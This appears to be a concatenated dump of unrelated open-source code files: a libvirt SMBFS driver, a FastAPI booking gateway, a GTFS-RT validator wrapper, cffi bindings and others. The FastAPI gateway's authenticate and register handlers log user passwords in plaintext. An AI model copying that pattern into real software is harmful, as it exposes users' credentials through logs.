nl|'\n'
name|'self'
op|')'
op|'.'
name|'get_config'
op|'('
name|'connection_info'
op|','
name|'disk_info'
op|')'
newline|'\n'
nl|'\n'
name|'conf'
op|'.'
name|'source_type'
op|'='
string|"'file'"
newline|'\n'
name|'conf'
op|'.'
name|'driver_cache'
op|'='
string|"'writethrough'"
newline|'\n'
name|'conf'
op|'.'
name|'source_path'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'device_path'"
op|']'
newline|'\n'
name|'conf'
op|'.'
name|'driver_format'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'.'
name|'get'
op|'('
string|"'format'"
op|','
string|"'raw'"
op|')'
newline|'\n'
name|'return'
name|'conf'
newline|'\n'
nl|'\n'
DECL|member|connect_volume
dedent|''
name|'def'
name|'connect_volume'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Connect the volume."""'
newline|'\n'
name|'smbfs_share'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'export'"
op|']'
newline|'\n'
name|'mount_path'
op|'='
name|'self'
op|'.'
name|'_get_mount_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'not'
name|'libvirt_utils'
op|'.'
name|'is_mounted'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
name|'self'
op|'.'
name|'_parse_mount_options'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'remotefs'
op|'.'
name|'mount_share'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|','
nl|'\n'
name|'export_type'
op|'='
string|"'cifs'"
op|','
name|'options'
op|'='
name|'mount_options'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'device_path'
op|'='
name|'self'
op|'.'
name|'_get_device_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'device_path'"
op|']'
op|'='
name|'device_path'
newline|'\n'
nl|'\n'
DECL|member|disconnect_volume
dedent|''
name|'def'
name|'disconnect_volume'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_dev'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Disconnect the volume."""'
newline|'\n'
name|'smbfs_share'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'export'"
op|']'
newline|'\n'
name|'mount_path'
op|'='
name|'self'
op|'.'
name|'_get_mount_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'remotefs'
op|'.'
name|'unmount_share'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_parse_mount_options
dedent|''
name|'def'
name|'_parse_mount_options'
op|'('
name|'self'
op|','
name|'connection_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
string|'" "'
op|'.'
name|'join'
op|'('
nl|'\n'
op|'['
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'.'
name|'get'
op|'('
string|"'options'"
op|')'
name|'or'
string|"''"
op|','
nl|'\n'
name|'CONF'
op|'.'
name|'libvirt'
op|'.'
name|'smbfs_mount_options'
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'not'
name|'USERNAME_REGEX'
op|'.'
name|'findall'
op|'('
name|'mount_options'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
name|'mount_options'
op|'+'
string|"' -o username=guest'"
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
comment|'# Remove the Domain Name from user name'
nl|'\n'
indent|' '
name|'mount_options'
op|'='
name|'USERNAME_REGEX'
op|'.'
name|'sub'
op|'('
string|"r'\\1=\\2'"
op|','
name|'mount_options'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'mount_options'
op|'.'
name|'strip'
op|'('
string|'", "'
op|')'
op|'.'
name|'split'
op|'('
string|"' '"
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 1.257813 | 1 |
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_negative_indexing_Access_Array_Elements.txt.py | webdevhub42/Lambda | 5 | 12786288 | <filename>WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_negative_indexing_Access_Array_Elements.txt.py
import numpy as np
arr = np.array([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]])
print("Last element from 2nd dim: ", arr[1, -1])
| 3.390625 | 3 |
api_gateway/main.py | leckijakub/hipotap | 0 | 12786289 | import asyncio
import sys
import time
import datetime
from queue import Queue
from threading import Thread
from typing import Optional
from fastapi import FastAPI, Form, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware
from sse_starlette.sse import EventSourceResponse
from google.protobuf import json_format
from hipotap_common.api.endpoints import (
GET_ORDER_PATH,
GET_TRENDS_PATH,
ORDER_PAYMENT_PATH,
ORDER_RESERVE_REQUEST_PATH,
ORDER_LIST_PATH,
ORDER_LISTEN_PATH,
OFFER_PATH,
OFFER_FILTERING_PATH,
OFFER_LISTEN_PATH
)
from hipotap_common.proto_messages.auth_pb2 import AuthStatus
from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB
from hipotap_common.proto_messages.hipotap_pb2 import BaseStatus
from hipotap_common.proto_messages.order_pb2 import (
GetOrderRequestPB,
OrderPB,
OrderPaymentRequestPB,
OrderRequestPB,
OrderListRequestPB,
)
from hipotap_common.proto_messages.offer_pb2 import (
OfferFilterPB
)
from pydantic import BaseModel
from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient
from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient
from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient
from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient
CUSTOMER_AUTH_QUEUE = "customer_auth"
class AuthData(BaseModel):
email: str
password: str
app = FastAPI()
origins = [
"http://localhost:17212",
"http://localhost:17213",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
time.sleep(5)
@app.post("/customer/authenticate/")
async def authenticate(email: str = Form(...), password: str = Form(...)):
print(f"Got [POST]/customer/authenticate/ with email={email}&password={password}")
sys.stdout.flush()
customer_credentials = CustomerCredentialsPB()
customer_credentials.email = email
customer_credentials.password = password
customer_client = CustomerRpcClient()
auth_response_pb = customer_client.authenticate(customer_credentials)
if auth_response_pb.status == AuthStatus.OK:
print("Authentication OK")
sys.stdout.flush()
return {
"name": auth_response_pb.customer_data.name,
"surname": auth_response_pb.customer_data.surname,
}
else:
raise HTTPException(status_code=401, detail="Invalid credentials")
@app.post("/customer/register/")
async def register(
name: str = Form(...),
surname: str = Form(...),
email: str = Form(...),
password: str = Form(...),
):
print(
f"Got [POST]/customer/register/ with name={name}, surname={surname}, email={email}, password={password}"
)
sys.stdout.flush()
customer_client = CustomerRpcClient()
customer_pb = CustomerPB()
customer_pb.data.name = name
customer_pb.data.surname = surname
customer_pb.credentials.email = email
customer_pb.credentials.password = password
reg_response = customer_client.register(customer_pb)
if reg_response.status == BaseStatus.OK:
print("Registration OK")
sys.stdout.flush()
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Email is taken")
@app.get("/offers/")
async def offers():
print(f"Got [GET]/offers/", flush=True)
offer_client = OfferRpcClient()
offer_list_pb = offer_client.get_offers()
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_PATH + "{offer_id}")
async def offer(offer_id: int):
print(f"Got [GET]/offer/{offer_id}", flush=True)
offer_client = OfferRpcClient()
offer_pb = offer_client.get_offer(offer_id)
return json_format.MessageToDict(
offer_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_FILTERING_PATH)
async def offers_filtered(
allowed_adult_count: Optional[int] = Form(None),
allowed_children_count: Optional[int] = Form(None),
max_adult_price: Optional[float] = Form(None),
max_children_price: Optional[float] = Form(None),
hotel: Optional[str] = Form(None),
place: Optional[str] = Form(None),
date_start: Optional[str] = Form(None),
date_end: Optional[str] = Form(None)
):
print(f"Got [GET]/offer/filter/ with "
f"allowed_adult_count={allowed_adult_count}, "
f"allowed_children_count={allowed_children_count}, "
f"max_adult_price={max_adult_price}, "
f"max_children_price = {max_children_price}, "
f"hotel={hotel}, "
f"place={place}, "
f"date_start={date_start}, "
f"date_end={date_end}", flush=True)
offer_client = OfferRpcClient()
offer_filter_pb = OfferFilterPB()
offer_filter_pb.use_allowed_adult_count = allowed_adult_count is not None
offer_filter_pb.use_allowed_children_count = allowed_children_count is not None
offer_filter_pb.use_max_adult_price = max_adult_price is not None
offer_filter_pb.use_max_children_price = max_children_price is not None
offer_filter_pb.use_place = place is not None
offer_filter_pb.use_hotel = hotel is not None
offer_filter_pb.use_date_start = date_start is not None
offer_filter_pb.use_date_end = date_end is not None
if offer_filter_pb.use_allowed_adult_count:
offer_filter_pb.allowed_adult_count = allowed_adult_count
if offer_filter_pb.use_allowed_children_count:
offer_filter_pb.allowed_children_count = allowed_children_count
if offer_filter_pb.use_max_adult_price:
offer_filter_pb.max_adult_price = max_adult_price
if offer_filter_pb.use_max_children_price:
offer_filter_pb.max_children_price = max_children_price
if offer_filter_pb.use_place:
offer_filter_pb.place = place
if offer_filter_pb.use_hotel:
offer_filter_pb.hotel = hotel
if offer_filter_pb.use_date_start:
offer_filter_pb.date_start.FromDatetime(datetime.datetime.strptime(date_start, "%Y-%m-%d"))
if offer_filter_pb.use_date_end:
offer_filter_pb.date_end.FromDatetime(datetime.datetime.strptime(date_end, "%Y-%m-%d"))
offer_list_pb = offer_client.get_offers_filtered(offer_filter_pb)
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_RESERVE_REQUEST_PATH)
async def order_reserve_request(
offer_id: int = Form(...),
customer_email: str = Form(...),
adult_count: int = Form(...),
children_count: int = Form(...),
):
order_client = OrderRpcClient()
order_request_pb = OrderRequestPB()
order_request_pb.offer_id = offer_id
order_request_pb.customer_email = customer_email
order_request_pb.adult_count = adult_count
order_request_pb.children_count = children_count
order_response = order_client.order_reserve_request(order_request_pb)
if order_response.status == BaseStatus.OK:
print("Order OK", flush=True)
order_pb = OrderPB()
order_response.message.Unpack(order_pb)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
else:
raise HTTPException(status_code=401, detail="Cannot order offer")
@app.get(ORDER_LIST_PATH)
async def order_list_request(customer_email: str = Form(...)):
order_client = OrderRpcClient()
order_list_request_pb = OrderListRequestPB()
order_list_request_pb.customer_email = customer_email
order_list_pb = order_client.get_order_list(order_list_request_pb)
return json_format.MessageToDict(
order_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(GET_ORDER_PATH)
async def get_order_request(order_id: int = Form(...)):
order_client = OrderRpcClient()
get_order_request_PB = GetOrderRequestPB()
get_order_request_PB.order_id = order_id
order_pb = order_client.get_order(get_order_request_PB)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_PAYMENT_PATH)
async def order_payment_request(
order_id: int = Form(...),
card_number: str = Form(...),
price: float = Form(...),
):
order_client = OrderRpcClient()
order_paymet_request_pb = OrderPaymentRequestPB()
order_paymet_request_pb.order_id = order_id
order_paymet_request_pb.payment_info.card_number = card_number
order_paymet_request_pb.payment_info.price = price
payment_response = order_client.order_payment_request(order_paymet_request_pb)
if payment_response.status == BaseStatus.OK:
print("Payment OK", flush=True)
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Cannot pay order")
MESSAGE_STREAM_RETRY_TIMEOUT = 15000  # milliseconds - change also in events_fanout_client (bad code)
MESSAGE_STREAM_DELAY = 1 # second (or maybe this one should be in events_fanout_client) (very bad code)
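# Consumes fan-out events on a background thread and pushes them onto a queue drained by the SSE generators below.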
def event_receiving(event_queue: Queue, event_type):
print("THREAD START", flush=True)
event_fanout_client = EventFanoutClient(event_queue, event_type)
event_fanout_client.start_consuming()
print("THREAD EXIT", flush=True)
@app.get(OFFER_LISTEN_PATH + "{offer_id}")
async def get_offer_events(offer_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /offer/listen/{offer_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "offer", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(ORDER_LISTEN_PATH + "{order_id}")
async def get_order_events(order_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /order/listen/{order_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "order", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(GET_TRENDS_PATH)
async def get_trends_request():
orders_client = OrderRpcClient()
trends_pb = orders_client.get_trends_request()
return json_format.MessageToDict(
trends_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
| 1.804688 | 2 |
datapypes/model.py | msmathers/datapypes | 1 | 12786290 | <filename>datapypes/model.py
from attribute import Attribute, InvalidAttributeValue
from source import Source
from store import Store
class InvalidAttribute(Exception): pass
class AttributeDoesNotExist(Exception): pass
class InvalidSource(Exception): pass
class InvalidStore(Exception): pass
class PypeDoesNotExist(Exception): pass
class Model(object):
__pypes__ = {}
def __init__(self, **attributes):
self._data = {}
# Validate model attributes
for k,v in attributes.items():
setattr(self, k, v)
# Nullify missing attributes
for attr in self._attributes:
if attr not in self._data:
setattr(self, attr, None)
# Validate model
self._validate()
def _validate(self):
return True
# Attribute validation
@property
def _attributes(self):
#Ensure Model attributes have been registered
if not hasattr(self.__class__, '__attributes__'):
self.__class__.__attributes__ = {}
for k,v in self.__class__.__dict__.items():
if isinstance(v, Attribute):
self.__class__.__attributes__[k] = v
return self.__class__.__attributes__
def _validate_attribute(self, attr, val):
attribute = self._attributes.get(attr)
if attribute is None:
raise AttributeDoesNotExist(attr)
if not attribute._validate(val):
raise InvalidAttribute(attr, attribute.__class__.__name__, val)
return True
def __setattr__(self, attr, value):
if attr in self._attributes:
if self._data.get(attr) is None:
if self._validate_attribute(attr, value):
self._data[attr] = value
self.__dict__[attr] = value
else:
raise InvalidAttribute(attr, value)
else:
self.__dict__[attr] = value
def _update(self, model):
for k,v in model._data.items():
setattr(self, k, v)
# Source methods
def get(self, *sources):
for source in sources:
if not isinstance(source, Source):
raise InvalidSource(source)
pype = self.__pypes__.get(self.__class__,{}).get(source.__class__)
if pype is None:
raise PypeDoesNotExist(self.__class__, source.__class__)
self._update(pype(self, source).one(self))
return self
# Store methods
def _store_action(self, method, *stores):
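        # Dispatch save/update/delete to the pype registered for each (model, store) class pair.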
for store in stores:
if not isinstance(store, Store):
raise InvalidStore(store)
pype = self.__pypes__.get(self.__class__,{}).get(store.__class__)
if pype is None:
raise PypeDoesNotExist(self.__class__, store.__class__)
getattr(pype(self, store), method)(self)
return self
def save(self, *stores):
return self._store_action('save', *stores)
def update(self, *stores):
return self._store_action('update', *stores)
def delete(self, *stores):
return self._store_action('delete', *stores) | 2.625 | 3 |
solentware_grid/tests/__init__.py | RogerMarsh/solentware-grid | 0 | 12786291 | """Unittests for solentware_grid package.
"PACKAGE CONTENTS" is incomplete because all the unittests are stubs.
"""
| 0.988281 | 1 |
prompt_toolkit/filters/types.py | gigforks/python-prompt-toolkit | 1 | 12786292 | from __future__ import unicode_literals
from inspect import ArgSpec
from six import with_metaclass
__all__ = (
'CLIFilter',
'SimpleFilter',
'check_signatures_are_equal',
)
class _FilterTypeMeta(type):
def __instancecheck__(cls, instance):
if not hasattr(instance, 'getargspec'):
return False
arguments = _drop_self(instance.getargspec())
return arguments.args == cls.arguments_list or arguments.varargs is not None
class _FilterType(with_metaclass(_FilterTypeMeta)):
def __new__(cls):
raise NotImplementedError('This class should not be initiated.')
class CLIFilter(_FilterType):
"""
Abstract base class for filters that accept a
:class:`~prompt_toolkit.interface.CommandLineInterface` argument. It cannot
be instantiated, it's only to be used for instance assertions, e.g.::
isinstance(my_filter, CliFilter)
"""
arguments_list = ['cli']
class SimpleFilter(_FilterType):
"""
Abstract base class for filters that don't accept any arguments.
"""
arguments_list = []
def _drop_self(spec):
"""
Take an argspec and return a new one without the 'self'.
"""
args, varargs, varkw, defaults = spec
if args[0:1] == ['self']:
args = args[1:]
return ArgSpec(args, varargs, varkw, defaults)
def check_signatures_are_equal(lst):
"""
Check whether all filters in this list have the same signature.
Raises `TypeError` if not.
"""
spec = _drop_self(lst[0].getargspec())
for f in lst[1:]:
if _drop_self(f.getargspec()) != spec:
raise TypeError('Trying to chain filters with different signature: %r and %r' %
(lst[0], f))
| 2.28125 | 2 |
setup.py | alena-lark/PrintNumAtom | 0 | 12786293 | <filename>setup.py
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="printnum",
version="0.1.9",
author="alena-lark",
author_email="<EMAIL>",
description="Printing a number of atoms in a molecule",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/alena-lark/PrintNumAtom",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
    install_requires=['numpy', 'rdkit'],
python_requires='>=3.7'
)
| 1.601563 | 2 |
gtfs_rt_validator_api.py | cal-itp/gtfs-rt-api | 0 | 12786294 | __version__ = "0.0.1"
import os
import json
import subprocess
import shutil
import pandas as pd
import argh
from tempfile import TemporaryDirectory, NamedTemporaryFile
from pathlib import Path
from collections import defaultdict
RT_BUCKET_FOLDER="gs://gtfs-data/rt"
RT_BUCKET_PROCESSED_FOLDER="gs://gtfs-data/rt-processed"
SCHEDULE_BUCKET_FOLDER="gs://gtfs-data/schedule"
# Note that the final {extraction_date} is needed by the validator, which may read it as
# timestamp data. Note that the final datetime requires Z at the end, to indicate
# it's a ISO instant
RT_FILENAME_TEMPLATE="{extraction_date}__{itp_id}__{url_number}__{src_fname}__{extraction_date}Z.pb"
N_THREAD_WORKERS = 30
try:
JAR_PATH = os.environ["GTFS_VALIDATOR_JAR"]
except KeyError:
raise Exception("Must set the environment variable GTFS_VALIDATOR_JAR")
# Utility funcs ----
def json_to_newline_delimited(in_file, out_file):
data = json.load(open(in_file))
with open(out_file, "w") as f:
f.write("\n".join([json.dumps(record) for record in data]))
def parse_pb_name_data(file_name):
"""Returns data encoded in extraction files, such as datetime or itp id.
>>> parse_pb_name_data("2021-01-01__1__0__filename__etc")
{'extraction_date': '2021-01-01', 'itp_id': 1, 'url_number': 0, 'src_fname': 'filename'}
"""
extraction_date, itp_id, url_number, src_fname, *_ = Path(file_name).name.split("__")
return dict(
extraction_date = extraction_date,
itp_id = int(itp_id),
url_number = int(url_number),
src_fname = src_fname)
def build_pb_validator_name(extraction_date, itp_id, url_number, src_fname):
"""Return name for file in the format needed for validation.
Note that the RT validator needs to use timestamps at the end of the filename,
so this function ensures they are present.
"""
return RT_FILENAME_TEMPLATE.format(
extraction_date=extraction_date,
itp_id=itp_id,
url_number=url_number,
src_fname=src_fname
)
# Validation ==================================================================
def gather_results(rt_path):
# TODO: complete functionality to unpack results into a DataFrame
# Path(rt_path).glob("*.results.json")
raise NotImplementedError()
def validate(gtfs_file, rt_path, verbose=False):
if not isinstance(gtfs_file, str):
raise NotImplementedError("gtfs_file must be a string")
stderr = subprocess.DEVNULL if not verbose else None
stdout = subprocess.DEVNULL if not verbose else None
subprocess.check_call([
"java",
"-jar", JAR_PATH,
"-gtfs", gtfs_file,
"-gtfsRealtimePath", rt_path,
"-sort", "name",
], stderr=stderr, stdout=stdout)
def validate_gcs_bucket(
project_id, token, gtfs_schedule_path, gtfs_rt_glob_path=None,
out_dir=None, results_bucket=None, verbose=False, aggregate_counts=False,
):
"""
Fetch and validate GTFS RT data held in a google cloud bucket.
Parameters:
project_id: name of google cloud project.
token: token argument passed to gcsfs.GCSFileSystem.
gtfs_schedule_path: path to a folder holding unpacked GTFS schedule data.
        gtfs_rt_glob_path: path that GCSFileSystem.glob can use to list all RT files.
Note that this is assumed to have the form {datetime}/{itp_id}/{url_number}/filename.
out_dir: a directory to store fetched files and results in.
results_bucket: a bucket path to copy results to.
verbose: whether to print helpful messages along the way.
Note that if out_dir is unspecified, the validation occurs in a temporary directory.
"""
import gcsfs
fs = gcsfs.GCSFileSystem(project_id, token=token)
if not out_dir:
tmp_dir = TemporaryDirectory()
tmp_dir_name = tmp_dir.name
else:
tmp_dir = None
tmp_dir_name = out_dir
    if results_bucket and not aggregate_counts and not results_bucket.endswith("/"):
        results_bucket = f"{results_bucket}/"
final_json_dir = Path(tmp_dir_name) / "newline_json"
try:
print("Fetching data")
dst_path_gtfs = f"{tmp_dir_name}/gtfs"
dst_path_rt = f"{tmp_dir_name}/rt"
# fetch and zip gtfs schedule
download_gtfs_schedule_zip(gtfs_schedule_path, dst_path_gtfs, fs)
# fetch rt data
if gtfs_rt_glob_path is None:
raise ValueError("One of gtfs rt glob path or date must be specified")
download_rt_files(dst_path_rt, fs, glob_path = gtfs_rt_glob_path)
print("Validating data")
validate(f"{dst_path_gtfs}.zip", dst_path_rt, verbose=verbose)
if results_bucket and aggregate_counts:
print(f"Saving aggregate counts as: {results_bucket}")
error_counts = rollup_error_counts(dst_path_rt)
df = pd.DataFrame(error_counts)
with NamedTemporaryFile() as tmp_file:
df.to_parquet(tmp_file.name)
fs.put(tmp_file.name, results_bucket)
elif results_bucket and not aggregate_counts:
# validator stores results as {filename}.results.json
print(f"Putting data into results bucket: {results_bucket}")
# fetch all results files created by the validator
all_results = list(Path(dst_path_rt).glob("*.results.json"))
final_json_dir.mkdir(exist_ok=True)
final_files = []
for result in all_results:
# we appended a final timestamp to the files so that the validator
# can use it to order them during validation. here, we remove that
# timestamp, so we can use a single wildcard to select, eg..
# *trip_updates.results.json
result_out = "__".join(result.name.split("__")[:-1])
json_to_newline_delimited(result, final_json_dir / result_out)
final_files.append(final_json_dir / result_out)
fs.put(final_files, results_bucket)
except Exception as e:
raise e
finally:
if isinstance(tmp_dir, TemporaryDirectory):
tmp_dir.cleanup()
def validate_gcs_bucket_many(
project_id, token, param_csv,
results_bucket=None, verbose=False, aggregate_counts=False,
status_result_path=None, strict=False, result_name_prefix="result_"
):
"""Validate many gcs buckets using a parameter file.
Additional Arguments:
strict: whether to raise an error when a validation fails
status_result_path: directory for saving the status of validations
result_name_prefix: a name to prefix to each result file name. File names
will be numbered. E.g. result_0.parquet, result_1.parquet for two feeds.
Param CSV should contain the following fields (passed to validate_gcs_bucket):
* gtfs_schedule_path
* gtfs_rt_glob_path
The full parameters CSV is dumped to JSON with an additional column called
    is_success, which reports on whether or not the validation was successful.
"""
import gcsfs
required_cols = ["gtfs_schedule_path", "gtfs_rt_glob_path"]
fs = gcsfs.GCSFileSystem(project_id, token=token)
params = pd.read_csv(fs.open(param_csv))
# check that the parameters file has all required columns
missing_cols = set(required_cols) - set(params.columns)
if missing_cols:
raise ValueError("parameter csv missing columns: %s" % missing_cols)
status = []
for idx, row in params.iterrows():
try:
validate_gcs_bucket(
project_id,
token,
results_bucket=results_bucket + f"/{result_name_prefix}{idx}.parquet",
verbose=verbose,
aggregate_counts=aggregate_counts,
**row[required_cols]
)
status.append({**row, "is_success": True})
except Exception as e:
if strict:
raise e
status.append({**row, "is_success": False})
status_newline_json = "\n".join([json.dumps(record) for record in status])
if status_result_path:
fs.pipe(status_result_path, status_newline_json.encode())
def download_gtfs_schedule_zip(gtfs_schedule_path, dst_path, fs):
# fetch and zip gtfs schedule
fs.get(gtfs_schedule_path, dst_path, recursive=True)
shutil.make_archive(dst_path, "zip", dst_path)
def download_rt_files(dst_dir, fs=None, date="2021-08-01", glob_path=None):
"""Download all files for an GTFS RT feed (or multiple feeds)
If date is specified, downloads daily data for all feeds. Otherwise, if
glob_path is specified, downloads data for a single feed.
Parameters:
date: date of desired feeds to download data from (e.g. 2021-09-01)
glob_path: if specified, the path (including a wildcard) for downloading a
single feed.
"""
if fs is None:
raise NotImplementedError("Must specify fs")
# {date}T{timestamp}/{itp_id}/{url_number}
all_files = fs.glob(glob_path) if glob_path else fs.glob(f"{RT_BUCKET_FOLDER}/{date}*/*/*/*")
to_copy = []
out_feeds = defaultdict(lambda: [])
for src_path in all_files:
dt, itp_id, url_number, src_fname = src_path.split("/")[-4:]
if glob_path:
dst_parent = Path(dst_dir)
else:
# if we are downloading multiple feeds, make each feed a subdir
dst_parent = Path(dst_dir) / itp_id / url_number
dst_parent.mkdir(parents=True, exist_ok=True)
out_fname = build_pb_validator_name(dt, itp_id, url_number, src_fname)
dst_name = str(dst_parent / out_fname)
to_copy.append([src_path, dst_name])
out_feeds[(itp_id, url_number)].append(dst_name)
print(f"Copying {len(to_copy)} files")
src_files, dst_files = zip(*to_copy)
fs.get(list(src_files), list(dst_files))
# Rectangling =================================================================
def rollup_error_counts(rt_dir):
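    # Flatten each *.results.json emitted by the validator into per-feed, per-error-code occurrence counts.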
result_files = Path(rt_dir).glob("*.results.json")
code_counts = []
for path in result_files:
metadata = parse_pb_name_data(path)
result_json = json.load(path.open())
for entry in result_json:
code_counts.append({
"calitp_itp_id": metadata["itp_id"],
"calitp_url_number": metadata["url_number"],
"calitp_extracted_at": metadata["extraction_date"],
"rt_feed_type": metadata["src_fname"],
"error_id": entry["errorMessage"]["validationRule"]["errorId"],
"n_occurrences": len(entry["occurrenceList"])
})
return code_counts
# Main ========================================================================
def main():
# TODO: make into simple CLI
result = argh.dispatch_commands([
validate, validate_gcs_bucket
])
if result is not None:
print(json.dumps(result))
if __name__ == "__main__":
main()
| 2.484375 | 2 |
src/wrappers/python/pygroupsig/blindsig_build.py | jmakr0/libgroupsig | 17 | 12786295 | # file "blindsig_build.py"
from pygroupsig.common_build import ffibuilder
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
void *sig;
} groupsig_blindsig_t;
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
typedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
groupsig_blindsig_init_f init;
groupsig_blindsig_free_f free;
groupsig_blindsig_copy_f copy;
groupsig_blindsig_get_size_f get_size;
groupsig_blindsig_export_f gexport;
groupsig_blindsig_import_f gimport;
groupsig_blindsig_to_string_f to_string;
} groupsig_blindsig_handle_t;
""")
ffibuilder.cdef("""
const groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);
""")
ffibuilder.cdef("""
int groupsig_blindsig_free(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
int groupsig_blindsig_get_size(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_export(
unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_import(
uint8_t code,
unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
char* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);
""")
| 1.984375 | 2 |
pcloudapi/pcloudjson.py | tochev/python3-pcloudapi | 6 | 12786296 | <gh_stars>1-10
#!/usr/bin/env python3
import requests
from .connection import AbstractPCloudConnection
PCLOUD_SERVER = "api.pcloud.com"
PCLOUD_PORT = 80
PCLOUD_SSL_PORT = 443
class PCloudJSONConnection(AbstractPCloudConnection):
"""Connection to pcloud.com based on their json protocol.
NOTE: loads the whole file in memory on data upload.
"""
def __init__(self,
use_ssl=True,
server=PCLOUD_SERVER, port=None,
timeout=30,
auth=None,
persistent_params=None):
